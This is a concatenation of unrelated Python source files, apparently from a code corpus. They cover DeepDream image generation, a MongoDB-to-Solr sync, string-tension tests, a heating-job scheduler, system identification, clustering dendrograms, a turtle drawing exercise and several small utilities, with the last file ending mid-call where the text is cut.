self.layer_names = ['layer1', 'layer2', 'layer3', 'layer4']
self.conv1 = resnet50.conv1
self.bn1 = resnet50.bn1
self.relu = resnet50.relu
self.maxpool = resnet50.maxpool
# 3
self.layer10 = resnet50.layer1[0]
self.layer11 = resnet50.layer1[1]
self.layer12 = resnet50.layer1[2]
# 4
self.layer20 = resnet50.layer2[0]
self.layer21 = resnet50.layer2[1]
self.layer22 = resnet50.layer2[2]
self.layer23 = resnet50.layer2[3]
# 6
self.layer30 = resnet50.layer3[0]
self.layer31 = resnet50.layer3[1]
self.layer32 = resnet50.layer3[2]
self.layer33 = resnet50.layer3[3]
self.layer34 = resnet50.layer3[4]
self.layer35 = resnet50.layer3[5]
# 3
self.layer40 = resnet50.layer4[0]
self.layer41 = resnet50.layer4[1]
# self.layer42 = resnet50.layer4[2]
# Go even deeper into ResNet's BottleNeck module for layer 42
self.layer42_conv1 = resnet50.layer4[2].conv1
self.layer42_bn1 = resnet50.layer4[2].bn1
self.layer42_conv2 = resnet50.layer4[2].conv2
self.layer42_bn2 = resnet50.layer4[2].bn2
self.layer42_conv3 = resnet50.layer4[2].conv3
self.layer42_bn3 = resnet50.layer4[2].bn3
self.layer42_relu = resnet50.layer4[2].relu
# Set these to False so that PyTorch won't be including them in its autograd engine - eating up precious memory
if not requires_grad:
for param in self.parameters():
param.requires_grad = False
# Feel free to experiment with different layers
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer10(x)
layer10 = x
x = self.layer11(x)
layer11 = x
x = self.layer12(x)
layer12 = x
x = self.layer20(x)
layer20 = x
x = self.layer21(x)
layer21 = x
x = self.layer22(x)
layer22 = x
x = self.layer23(x)
layer23 = x
x = self.layer30(x)
layer30 = x
x = self.layer31(x)
layer31 = x
x = self.layer32(x)
layer32 = x
x = self.layer33(x)
layer33 = x
x = self.layer34(x)
layer34 = x
x = self.layer35(x)
layer35 = x
x = self.layer40(x)
layer40 = x
x = self.layer41(x)
layer41 = x
layer42_identity = layer41
x = self.layer42_conv1(x)
layer420 = x
x = self.layer42_bn1(x)
layer421 = x
x = self.layer42_relu(x)
layer422 = x
x = self.layer42_conv2(x)
layer423 = x
x = self.layer42_bn2(x)
layer424 = x
x = self.layer42_relu(x)
layer425 = x
x = self.layer42_conv3(x)
layer426 = x
x = self.layer42_bn3(x)
layer427 = x
x += layer42_identity
layer428 = x
x = self.relu(x)
layer429 = x
# Feel free to experiment with different layers, layer35 is my favourite
net_outputs = namedtuple("ResNet50Outputs", self.layer_names)
# You can see the potential ambiguity arising here if we later want to reconstruct images purely from the filename
out = net_outputs(layer10, layer23, layer34, layer40)
return out
def deep_dream_video(config):
video_path = utils.parse_input_file(config['input'])
tmp_input_dir = os.path.join(OUT_VIDEOS_PATH, 'tmp_input')
tmp_output_dir = os.path.join(OUT_VIDEOS_PATH, 'tmp_out')
config['dump_dir'] = tmp_output_dir
os.makedirs(tmp_input_dir, exist_ok=True)
os.makedirs(tmp_output_dir, exist_ok=True)
metadata = video_utils.extract_frames(video_path, tmp_input_dir)
config['fps'] = metadata['fps']
utils.print_deep_dream_video_header(config)
last_img = None
config['img_width'] = 960
for frame_id, frame_name in enumerate(sorted(os.listdir(tmp_input_dir))):
# Step 1: load the video frame
print(f'Processing frame {frame_id}')
frame_path = os.path.join(tmp_input_dir, frame_name)
frame = utils.load_image(frame_path, target_shape=config['img_width'])
# Step 2: potentially blend it with the last frame
if config['blend'] is not None and last_img is not None:
# blend: 1.0 - use the current frame, 0.0 - use the last frame, everything in between will blend the two
frame = utils.linear_blend(last_img, frame, config['blend'])
if frame_id < 35:
last_img = frame
dreamed_frame = frame
dump_path = utils.save_and_maybe_display_image(config, dreamed_frame, name_modifier=frame_id)
print(f'Saved DeepDream frame to: {os.path.relpath(dump_path)}\n')
continue
# Step 3: Send the blended frame to some good old DeepDreaming
if frame_id in range(35,44):
factor = 0
elif frame_id in range(44,55):
factor = 1
elif frame_id in range(55,65):
factor = 2
elif frame_id in range(65,75):
factor = 3
elif frame_id in range(75,85):
factor = 4
else:
factor = 5
config['model_name'] = SupportedModels.RESNET50.name
config['pretrained_weights'] = SupportedPretrainedWeights.PLACES_365.name
config['layers_to_use'] = ['layer3'] # layer34 was used
config['pyramid_size'] = 1 + factor #1-4
config['pyramid_ratio'] = 1.5 + 0.1*factor#1.8
config['num_gradient_ascent_iterations'] = 7 + factor#10
config['lr'] = 0.09
config['spatial_shift_size'] = 30 + factor*2#40
dreamed_frame = deep_dream_static_image(config, frame)
# Step 4: save the frame and keep the reference
last_img = dreamed_frame
dump_path = utils.save_and_maybe_display_image(config, dreamed_frame, name_modifier=frame_id)
print(f'Saved DeepDream frame to: {os.path.relpath(dump_path)}\n')
video_utils.create_video_from_intermediate_results(config)
shutil.rmtree(tmp_input_dir) # remove tmp files
print(f'Deleted tmp frame dump directory {tmp_input_dir}.')
if __name__ == "__main__":
# Only a small subset is exposed by design to avoid cluttering
parser = argparse.ArgumentParser()
# Common params
parser.add_argument("--input", type=str, help="Input IMAGE or VIDEO name that will be used for dreaming", default='figures.jpg')
parser.add_argument("--img_width", type=int, help="Resize input image to this width", default=600)
parser.add_argument("--layers_to_use", type=str, nargs='+', help="Layer whose activations we should maximize while dreaming", default=['relu3_3'])
parser.add_argument("--model_name", choices=[m.name for m in SupportedModels],
help="Neural network (model) to use for dreaming", default=SupportedModels.VGG16_EXPERIMENTAL.name)
parser.add_argument("--pretrained_weights", choices=[pw.name for pw in SupportedPretrainedWeights],
help="Pretrained weights to use for the above model", default=SupportedPretrainedWeights.IMAGENET.name)
# Main params for experimentation (especially pyramid_size and pyramid_ratio)
parser.add_argument("--pyramid_size", type=int, help="Number of images in an image pyramid", default=4)
parser.add_argument("--pyramid_ratio", type=float, help="Ratio of image sizes in the pyramid", default=1.8)
parser.add_argument("--num_gradient_ascent_iterations", type=int, help="Number of gradient ascent iterations", default=10)
parser.add_argument("--lr", type=float, help="Learning rate i.e. step size in gradient ascent", default=0.09)
# deep_dream_video_ouroboros specific arguments (ignore for other 2 functions)
parser.add_argument("--create_ouroboros", action='store_true', help="Create Ouroboros video (default False)")
parser.add_argument("--ouroboros_length", type=int, help="Number of video frames in ouroboros video", default=30)
parser.add_argument("--fps", type=int, help="Number of frames per second", default=30)
parser.add_argument("--frame_transform", choices=[t.name for t in TRANSFORMS],
help="Transform used to transform the output frame and feed it back to the network input",
default=TRANSFORMS.ZOOM_ROTATE.name)
# deep_dream_video specific arguments (ignore for other 2 functions)
parser.add_argument("--blend", type=float, help="Blend coefficient for video creation", default=0.85)
# You usually won't need to change these as often
parser.add_argument("--should_display", action='store_true', help="Display intermediate dreaming results (default False)")
parser.add_argument("--spatial_shift_size", type=int, help='Number of pixels to randomly shift image before grad ascent', default=32)
parser.add_argument("--smoothing_coefficient", type=float, help='Directly controls standard deviation for gradient smoothing', default=0.5)
parser.add_argument("--use_noise", action='store_true', help="Use noise as a starting point instead of input image (default False)")
args = parser.parse_args()
# Wrapping configuration into a dictionary
config = dict()
for arg in vars(args):
config[arg] = getattr(args, arg)
config['dump_dir'] = OUT_VIDEOS_PATH if config['create_ouroboros'] else OUT_IMAGES_PATH
config['dump_dir'] = os.path.join(config['dump_dir'], f'{config["model_name"]}_{config["pretrained_weights"]}')
config['input_name'] = os.path.basename(config['input'])
# Create Ouroboros video (feeding neural network's output to it's input)
if config['create_ouroboros']:
deep_dream_video_ouroboros(config)
# Create a blended DeepDream video
elif any([config['input_name'].lower().endswith(video_ext) for video_ext in SUPPORTED_VIDEO_FORMATS]): # only support mp4 atm
deep_dream_video(config)
else: # Create a static DeepDream image
print('Dreaming started!')
img = deep_dream_static_image(config, img=None) # img=None -> will be loaded inside of deep_dream_static_image
dump_path = utils.save_and_maybe_display_image(config, img)
print(f'Saved DeepDream static image to: {os.path.relpath(dump_path)}\n')
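# Hypothetical example invocations (assuming this file is saved as deepdream.py; the
# image/video names are placeholders, and all flags are defined by the argparse setup above):
#   python deepdream.py --input figures.jpg --img_width 600 --pyramid_size 4 --lr 0.09
#   python deepdream.py --input some_video.mp4 --blend 0.85
#   python deepdream.py --input figures.jpg --create_ouroboros --ouroboros_length 30 --use_noise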
|
from .SearchTree import SearchTree, ActionNode, ChanceNode, expand_action, Node, MCTS_Info, HeuristicVector
from .Samplers import MockPolicy, Policy
from .searchers.search_util import ContinueCondition
from .searchers.deterministic import deterministic_tree_search_rollout, get_node_value, mcts_ucb_rollout
from .searchers.mcts import vanilla_mcts_rollout
|
#!/usr/bin/env python
# The outputManager synchronizes the output display for all the various threads
#####################
import threading
class outputStruct():
def __init__( self ):
self.id = 0
self.updateObjSem = None
self.title = ""
self.numOfInc = 0
class outputManager( threading.Thread ):
def __init__( self ):
threading.Thread.__init__(self)
self.outputObjs = dict()
self.outputListLock = threading.Lock()
# Used to assign the next id for an output object
self.nextId = 0
self.isAlive = True
def createOutputObj( self, name, numberOfIncrements ):
raise NotImplementedError('Should have implemented this')
def updateOutputObj( self, objectId ):
raise NotImplementedError('Should have implemented this')
def run (self):
raise NotImplementedError('Should have implemented this')
def stop(self):
self.isAlive = False
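# Hypothetical minimal subclass sketch (not part of the original module) showing one way
# the abstract hooks above could be implemented with a simple console backend.
import time
class consoleOutputManager( outputManager ):
    def createOutputObj( self, name, numberOfIncrements ):
        newObj = outputStruct()
        newObj.title = name
        newObj.numOfInc = numberOfIncrements
        with self.outputListLock:
            newObj.id = self.nextId
            self.outputObjs[newObj.id] = newObj
            self.nextId += 1
        return newObj.id
    def updateOutputObj( self, objectId ):
        with self.outputListLock:
            obj = self.outputObjs[objectId]
        print('%s: progress update (1 of %d increments)' % (obj.title, obj.numOfInc))
    def run( self ):
        # A real implementation would wait on work items; this just idles until stop().
        while self.isAlive:
            time.sleep(0.1)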
|
from errbot import BotPlugin, botcmd
class Example(BotPlugin):
"""
This is a very basic plugin to try out your new installation and get you started.
Feel free to tweak me to experiment with Errbot.
You can find me in your init directory in the subdirectory plugins.
"""
@botcmd # flags a command
def tryme(self, msg, args): # a command callable with !tryme
"""
Execute to check if Errbot responds to command.
Feel free to tweak me to experiment with Errbot.
You can find me in your init directory in the subdirectory plugins.
"""
return "It *works* !" # This string format is markdown.
|
#!/usr/bin/env python3
import os,sys
import traceback
from pymongo import MongoClient
from bson.objectid import ObjectId
from data_backup import Data_backup
from solr import SOLR
from solr import SOLR_CORE_NAME
'''
_id => str(_id)
Add scene:db_name and topic:collection fields
If a super_intention field exists and is empty, replace it with null
If a questions or equal_questions field exists, split it up and store one document per question as
{question, question_ik, question_cn}, then remove questions or equal_questions
'''
class Update():
def __init__(self, ip, db_name):
self.db_name = db_name
        self.db = MongoClient(ip, 27017)[db_name]
self.core_name = SOLR_CORE_NAME
self.solr_url = 'http://127.0.0.1:8999/solr'
self.solr = SOLR(self.solr_url)
def check_solr_core(self):
if not self.solr.solr_core_exists(self.core_name):
self.solr.create_solr_core(self.core_name)
def update_data(self, collection):
def insert(data):
if not data:
return
data_one = data.copy()
data_one['_id'] = str(data_one['_id'])
data_one['scene'] = self.db_name
data_one['topic'] = collection
if 'super_intention' in data_one:
if data_one['super_intention'] == '':
data_one['super_intention'] = 'null'
if 'equal_questions' in data_one:
data_one.pop('equal_questions')
for q in data['equal_questions']:
data_one['question'] = q
data_one['question_ik'] = q
data_one['question_cn'] = q
self.solr.update_solr(data_one, self.core_name)
elif 'questions' in data_one:
data_one.pop('questions')
for q in data['questions']:
data_one['question'] = q
data_one['question_ik'] = q
data_one['question_cn'] = q
self.solr.update_solr(data_one, self.core_name)
else:
self.solr.update_solr(data_one, self.core_name)
self.solr.delete_solr_by_query(self.core_name,
'scene_str:'+self.db_name+' AND topic_str:'+collection)
data = [x for x in self.db[collection].find()]
for d in data:
insert(d)
def update(self):
try:
collections = self.db.collection_names()
if 'log' in collections:
collections.remove('log')
for collection in collections:
print('start '+collection)
self.update_data(collection)
return 1
except Exception:
traceback.print_exc()
return 0
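# Hypothetical illustration (not part of the original script) of the expansion that
# Update.update_data performs: one Mongo document with equal_questions/questions is
# split into several Solr documents, one per question, without touching Solr itself.
def expand_questions(doc, scene, topic):
    base = dict(doc, _id=str(doc['_id']), scene=scene, topic=topic)
    if base.get('super_intention') == '':
        base['super_intention'] = 'null'
    questions = base.pop('equal_questions', None) or base.pop('questions', None)
    if not questions:
        return [base]
    docs = []
    for q in questions:
        d = dict(base)
        d['question'] = d['question_ik'] = d['question_cn'] = q
        docs.append(d)
    return docs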
if __name__ == '__main__':
up = Update('127.0.0.1', 'bank_psbc')
up.update()
|
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2022 David E. Lambert
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import math
import pytest
import tomli
from tealc import StringTension
with open('./tests/data/string_data.toml', 'rb') as f:
string_data = tomli.load(f)
material = []
pitch = []
gauge = []
tension = []
for m in string_data.keys():
for p in string_data[m].keys():
n = len(string_data[m][p]['gauge'])
material.extend([m] * n)
pitch.extend([p] * n)
gauge.extend(string_data[m][p]['gauge'])
tension.extend(string_data[m][p]['tension'])
guitar_data = list(zip(gauge, material, pitch, tension))
@pytest.mark.parametrize('test_g, test_m, test_p, expected', guitar_data)
def test_accuracy(test_g, test_m, test_p, expected):
"""Test calculations against mfr. charts."""
calc = StringTension(test_g, test_m, test_p, length=25.5)
assert math.isclose(calc.lb, expected, rel_tol=0.1)
with open('./tests/data/bass_string_data.toml', 'rb') as f:
bass_string_data = tomli.load(f)
b_material = []
b_pitch = []
b_gauge = []
b_tension = []
for m in bass_string_data.keys():
for p in bass_string_data[m].keys():
n = len(bass_string_data[m][p]['gauge'])
b_material.extend([m] * n)
b_pitch.extend([p] * n)
b_gauge.extend(bass_string_data[m][p]['gauge'])
b_tension.extend(bass_string_data[m][p]['tension'])
bass_data = list(zip(b_gauge, b_material, b_pitch, b_tension))
print(bass_data)
@pytest.mark.parametrize('test_g, test_m, test_p, expected', bass_data)
def test_bass_accuracy(test_g, test_m, test_p, expected):
"""Test bass string calculations against mfr. charts."""
calc = StringTension(test_g, test_m, test_p, length=34)
assert math.isclose(calc.lb, expected, rel_tol=0.1)
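# Hypothetical standalone check (not part of the test suite) mirroring the first
# parametrized guitar case above; StringTension exposes the tension in pounds as .lb.
if __name__ == '__main__':
    example = StringTension(gauge[0], material[0], pitch[0], length=25.5)
    print('first chart entry:', gauge[0], material[0], pitch[0],
          '-> calculated %.2f lb (chart: %s)' % (example.lb, tension[0]))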
|
import inspect
import logging
import sys
from datetime import timedelta
from .. import heating, sensing
from ..utils import broadcast, time_utils, translation
_ = translation.translator_fx()
_logger = logging.getLogger('NonHeatingJobs')
def function_names_for_non_heating_jobs():
"""Returns the function names available for scheduling as a NonHeatingJob."""
this_module = sys.modules[__name__]
functions = inspect.getmembers(this_module, inspect.isfunction)
exclude = ['function_names_for_non_heating_jobs', 'get_job_function']
return [f[0] for f in functions if f[0] not in exclude and not f[0].startswith('_')]
def dummy_task():
"""Task used for testing and (early) development stages."""
_logger.info(f"Scheduled heartbeat message at {time_utils.t_now_local()}.")
def log_temperature_sensors():
"""Stores the current temperature readings."""
sensing.save_temperature_log()
def check_temperature_sensors():
"""Hourly check if temperature sensors are still connected."""
sensing.check_sensors()
def clean_old_dbase_entries():
"""
Daily clean up script to remove outdated entries from the dbase, because we
don't want to (and also cannot) store everything.
"""
# Clear entries older than 4 weeks
# So we should be able to keep the dbase at approximately 65 MB, because
# 1 log entry (every 5 minutes) with 5 sensors makes up ca. 8.2kB
dt = time_utils.dt_now_local() - timedelta(days=28)
# Temperature sensor log:
rsp = sensing.temperature_log.clear_old_entries(dt)
if not rsp.success:
_logger.error('Could not clear outdated sensor log entries.')
broadcast.error(rsp.message, receiver='both', source=broadcast.SRC_SENSOR_LOG)
else:
_logger.info(rsp.message)
# Central heating log:
rsp = heating.central_heating_log.clear_old_entries(dt)
if not rsp.success:
_logger.error('Could not clear outdated central heating log entries.')
broadcast.error(rsp.message, receiver='both', source=broadcast.SRC_CENTRAL_HEATING_LOG)
else:
_logger.info(rsp.message)
def get_job_function(job_type):
"""
Returns the callback function for the NonHeatingJob.
The name of the callback function is given by "job_type".
"""
this_module = sys.modules[__name__]
return getattr(this_module, job_type)
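# Hypothetical usage sketch: resolve a schedulable job by name and invoke it once.
# The leading underscore keeps this helper out of function_names_for_non_heating_jobs().
def _run_job_once(job_type='dummy_task'):
    if job_type not in function_names_for_non_heating_jobs():
        raise ValueError(f'Unknown job type: {job_type}')
    get_job_function(job_type)()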
|
#!/usr/bin/env python3
"""Monte Carlo blackbox collocation-based FEM system id."""
import argparse
import importlib
import os
import pathlib
import numpy as np
import scipy.io
import sympy
import sym2num.model
import fem
import symfem
# Reload modules for testing
for m in (fem, symfem):
importlib.reload(m)
class Model(symfem.MaximumLikelihoodDTModel, symfem.BalancedDTModel):
generated_name = 'GeneratedBalancedMaximumLikelihoodModel'
class MLProblem(fem.MaximumLikelihoodDTProblem, fem.BalancedDTProblem):
pass
def load_data(datafile):
data = scipy.io.loadmat(datafile)
# Retrieve data
u = data['u']
y = data['y']
N = len(y)
ue = u[N//2:]
ye = y[N//2:]
uv = u[:N//2]
yv = y[:N//2]
return uv, yv, ue, ye
def load_estimates(datafile):
estfile = datafile.parent / ('estim_' + datafile.name)
return scipy.io.loadmat(estfile)
def predict(mdl, y, u, x0=None):
A = mdl['A']
B = mdl['B']
C = mdl['C']
D = mdl['D']
Lun = mdl['Lun']
nx = len(A)
N = len(y)
if x0 is None:
x0 = np.zeros(nx)
x = np.tile(x0, (N, 1))
eun = np.empty_like(y)
for k in range(N):
eun[k] = y[k] - C @ x[k] - D @ u[k]
if k+1 < N:
x[k+1] = A @ x[k] + B @ u[k] + Lun @ eun[k]
Rp = 1/N * eun.T @ eun
    sRp = np.linalg.cholesky(Rp)
    return x, eun, Rp, sRp
def estimate(datafile):
pass
def get_model(config):
nx = config['nx']
nu = config['nu']
ny = config['ny']
modname = f'{Model.generated_name}_nx{nx}_nu{nu}_ny{ny}'
try:
mod = importlib.import_module(modname)
cls = getattr(mod, Model.generated_name)
return cls()
except ImportError:
symmodel = Model(nx=nx, nu=nu, ny=ny)
with open(f'{modname}.py', mode='w') as f:
print(symmodel.print_code(), file=f)
return get_model(config)
def cmdline_args():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'edir', nargs='?', default='data/mc_experim',
help='experiment directory',
)
return parser.parse_args()
if __name__ == '__main__':
args = cmdline_args()
edir = pathlib.Path(args.edir)
config = scipy.io.loadmat(edir / 'config.mat', squeeze_me=True)
model = get_model(config)
datafiles = sorted(edir.glob('exp*.mat'))
for datafile in datafiles:
uv, yv, ue, ye = load_data(datafile)
in_prob = fem.InnovationDTProblem(model, ye, ue)
ml_prob = MLProblem(model, ye, ue)
raise SystemExit
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'text_editor.ui'
#
# Created: Sun Nov 15 17:09:47 2009
# by: PyQt4 UI code generator 4.6.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_DockWidget(object):
def setupUi(self, DockWidget):
DockWidget.setObjectName("DockWidget")
DockWidget.setWindowModality(QtCore.Qt.NonModal)
DockWidget.setEnabled(True)
DockWidget.resize(548, 556)
font = QtGui.QFont()
font.setPointSize(10)
DockWidget.setFont(font)
DockWidget.setFocusPolicy(QtCore.Qt.TabFocus)
DockWidget.setContextMenuPolicy(QtCore.Qt.PreventContextMenu)
DockWidget.setAcceptDrops(False)
DockWidget.setFloating(False)
DockWidget.setFeatures(QtGui.QDockWidget.AllDockWidgetFeatures)
DockWidget.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)
self.dockWidgetContents = QtGui.QWidget()
self.dockWidgetContents.setObjectName("dockWidgetContents")
self.gridLayout = QtGui.QGridLayout(self.dockWidgetContents)
self.gridLayout.setObjectName("gridLayout")
self.textEdit = QtGui.QTextEdit(self.dockWidgetContents)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.textEdit.sizePolicy().hasHeightForWidth())
self.textEdit.setSizePolicy(sizePolicy)
self.textEdit.setAcceptDrops(False)
self.textEdit.setFrameShadow(QtGui.QFrame.Plain)
self.textEdit.setLineWidth(0)
self.textEdit.setAcceptRichText(False)
self.textEdit.setObjectName("textEdit")
self.gridLayout.addWidget(self.textEdit, 0, 0, 1, 1)
DockWidget.setWidget(self.dockWidgetContents)
self.retranslateUi(DockWidget)
QtCore.QMetaObject.connectSlotsByName(DockWidget)
def retranslateUi(self, DockWidget):
DockWidget.setWindowTitle(QtGui.QApplication.translate("DockWidget", "Mapnik Xml View", None, QtGui.QApplication.UnicodeUTF8))
self.textEdit.setHtml(QtGui.QApplication.translate("DockWidget", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Lucida Grande\'; font-size:10pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:11pt;\"></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import shipment
admin.site.register(shipment)
|
#!/bin/python
import sys, os
sys.path.append("/network/lustre/iss01/home/daniel.margulies/data/lsd/")
from load_fs import load_fs
import numpy as np
import nibabel as nib
from mapalign import embed
from numba import jit
from scipy.sparse.linalg import eigsh
from scipy import sparse
@jit(parallel=True)
def run_perc(data, thresh):
perc_all = np.zeros(data.shape[0])
for n,i in enumerate(data):
data[n, i < np.percentile(i, thresh)] = 0.
for n,i in enumerate(data):
data[n, i < 0.] = 0.
return data
def main(s):
import os.path
if os.path.isfile('/network/lustre/iss01/home/daniel.margulies/data/lsd/embedding/embedding_dense_emb.%s.npy' % s):
emb = np.load('/network/lustre/iss01/home/daniel.margulies/data/lsd/embedding/embedding_dense_emb.%s.npy' % s)
else:
K = load_fs(s)
K[np.isnan(K)] = 0.0
A_mA = K - K.mean(1)[:,None]
ssA = (A_mA**2).sum(1)
Asq = np.sqrt(np.dot(ssA[:,None],ssA[None]))
Adot = A_mA.dot(A_mA.T)
K = Adot/Asq
del A_mA, ssA, Asq, Adot
K = run_perc(K, 90)
norm = (K * K).sum(0, keepdims=True) ** .5
K = K.T @ K
aff = K / norm / norm.T
del norm, K
#aff = sparse.csr_matrix(aff)
emb, res = embed.compute_diffusion_map(aff, alpha = 0.5, n_components=5, skip_checks=True, overwrite=True, eigen_solver=eigsh, return_result=True)
del aff
np.save('/network/lustre/iss01/home/daniel.margulies/data/lsd/embedding/embedding_dense_emb.%s.npy' % s, emb)
np.save('/network/lustre/iss01/home/daniel.margulies/data/lsd/embedding/embedding_dense_res.%s.npy' % s, res)
if __name__ == "__main__":
main(sys.argv[1])
|
#!/usr/bin/python3
from setuptools import setup, find_packages
setup(
name="RedPaper",
version="1.0",
install_requires=['docutils>=0.3', 'praw>=6.2.0'],
# metadata to display on PyPI
author="Teddy Okello",
author_email="keystroke3@gmail.com",
description="A program to download and change desktop wallpapers",
license="PSF",
keywords="change wallpaper reddit in linux desktop gnome kde xfce budgie",
url="https://github.com/keystroke3/redpaper", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/keystroke3/redpaper/issues",
"Documentation": "https://github.com/keystroke3/redpaper/wiki",
"Source Code": "https://github.com/keystroke3/redpaper",
}
)
|
# poropy/coretools/vendor.py
class Vendor(object):
""" Fresh fuel vendor. *NOT IMPLEMENTED*
"""
def __init__(self):
""" Constructor.
"""
|
import re
with open("input", "r") as f:
lines = f.readlines()
lines = [line.strip() for line in lines if line.strip()]
class TargetArea:
def __init__(self, desc_str):
target_area_regexp = re.compile("target area: x=([0-9]+)\\.\\.([0-9]+), y=(-[0-9]+)\\.\\.(-[0-9]+)")
bounds = target_area_regexp.findall(desc_str)[0]
self.x_bounds = (int(bounds[0]), int(bounds[1]))
self.y_bounds = (int(bounds[2]), int(bounds[3]))
def point_inside(self, x, y):
return self.x_bounds[0] <= x <= self.x_bounds[1] and self.y_bounds[0] <= y <= self.y_bounds[1]
def point_beyond(self, x, y):
return x > max(self.x_bounds) or y < min(self.y_bounds)
ta = TargetArea(lines[0])
global_max_y = 0
for ivx in range(1, max(ta.x_bounds) + 1):
# iterate over Initial Velocity X (ivx)
# the maximum ivx value is the furthest side of the target area (on the X axis)
for ivy in range(min(ta.y_bounds), max(abs(ta.y_bounds[0]), abs(ta.y_bounds[1]))):
        # iterate over Initial Velocity Y (ivy)
        #
        # ivy starts at the deepest edge of the target area (most negative y):
        # anything lower overshoots downward on the very first step
        #
        # a probe launched upward always comes back through y=0 (whatever ivy is)
        # with velocity -(ivy + 1), so an ivy larger than the depth of the target
        # area is guaranteed to miss - hence the upper bound of this range
# probe's highest y position for the given (ivx, ivy)
max_y = 0
# probe's initial position and velocity
x = 0
y = 0
vy = ivy
vx = ivx
while not ta.point_beyond(x, y):
# update probe's position
x += vx
y += vy
# update probe's highest y position
max_y = max(max_y, y)
if ta.point_inside(x, y):
                # the probe landed inside the target area
global_max_y = max(global_max_y, max_y)
break
# update vx and vy
if vx > 0:
vx -= 1
elif vx < 0:
vx += 1
vy -= 1
print(global_max_y)
|
#################################################################################
# Author: Jacob Barnwell Taran Wells
# Username: barnwellj wellst
#
# Assignment: TO3
# Purpose:
#################################################################################
# Acknowledgements:
#
#
#################################################################################
import turtle
def draw_square(jimmy):
"""Creates the box for the drawing
"""
jimmy.penup()
jimmy.setpos(-250,250)
jimmy.pendown()
for s in range(4):
jimmy.forward(594)
jimmy.right(90)
pass
# ...
def right_turns(jimmy):
"""right turns within the box
"""
jimmy.forward(550)
jimmy.right(90)
jimmy.forward(22)
jimmy.right(90)
pass
# ...
def left_turns(jimmy):
"""left turns within the box
"""
jimmy.forward(550)
jimmy.left(90)
jimmy.forward(22)
jimmy.left(90)
pass
def main():
"""
Docstring for main
"""
# ...
wn = turtle.Screen()
jimmy = turtle.Turtle()
jimmy.color("black") # importing the Turtle and screen, applying attributes
jimmy.pensize(22)
jimmy.speed(15)
draw_square(jimmy) # Function to draw the main square
jimmy.penup()
jimmy.forward(22)
jimmy.right(90)
jimmy.forward(22)
jimmy.left(90)
jimmy.color("blue")
jimmy.pendown()
for i in range(12):
        right_turns(jimmy) # Function call to right_turns
        left_turns(jimmy) # Function call to left_turns
right_turns(jimmy) #finishes the fill
jimmy.forward(550)
wn.exitonclick()
main()
|
# Generated with RandomSeedGeneration
#
from enum import Enum
from enum import auto
class RandomSeedGeneration(Enum):
""""""
INTRINSIC = auto()
RANLUX = auto()
RNSNLW = auto()
def label(self):
if self == RandomSeedGeneration.INTRINSIC:
return "Intrinsic"
if self == RandomSeedGeneration.RANLUX:
return "RanLux"
if self == RandomSeedGeneration.RNSNLW:
return "RNSNLW"
|
# Build the matrices
#IMPORTS
import json
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans
from sklearn.metrics import adjusted_rand_score
from scipy.cluster.hierarchy import dendrogram, linkage
from matplotlib import pyplot as plt
import glob
import codecs
import sys
from numpy import ndarray
import array
import re
#import scipy.cluster.hierarchy as shc
fic = sys.argv[1]
# Open/load the patterns file
#f = open("patterns/patt_dumas_feval_minlen=1_maxlen=1.json")
f = open(fic)
dic = json.load(f)
f.close()
data = dic["all_files"]
patterns = dic["all_patt"]
liste_fichiers = list(data.keys()) # the order is fixed | list() is required so liste_fichiers can be indexed later
matrix = []
for fichier in liste_fichiers :
matrix.append(data[fichier])
noms_abreges = [re.sub(r"corpus1\/(.*\/.*).txt.*", r"\1", nom) for nom in liste_fichiers]
labelList = noms_abreges
#OK
#plt.figure(figsize=(10, 7))
#plt.title("Customer Dendograms")
#dend = shc.dendrogram(shc.linkage(matrix, method='ward'))
liste_methodes = ['single', 'complete', 'average', 'weighted', 'centroid', 'median', 'ward']
for methode in liste_methodes :
linked = linkage(matrix, methode)
plt.figure(figsize=(10, 7))
plt.title("Dendrogramme (méthode '%s', paramètres par défaut)"%methode)
dendrogram(linked, orientation='top', labels=labelList, leaf_rotation = 90., distance_sort='descending', show_leaf_counts=True)
plt.savefig("results/scipy_dendogram_cdf_%s_default.png"%methode, bbox_inches='tight')
|
Experiment(description='Relational ABCD',
data_dir='../srkl-data/stocks/',
max_depth=5,
random_order=False,
k=1,
debug=False,
local_computation=True,
n_rand=9,
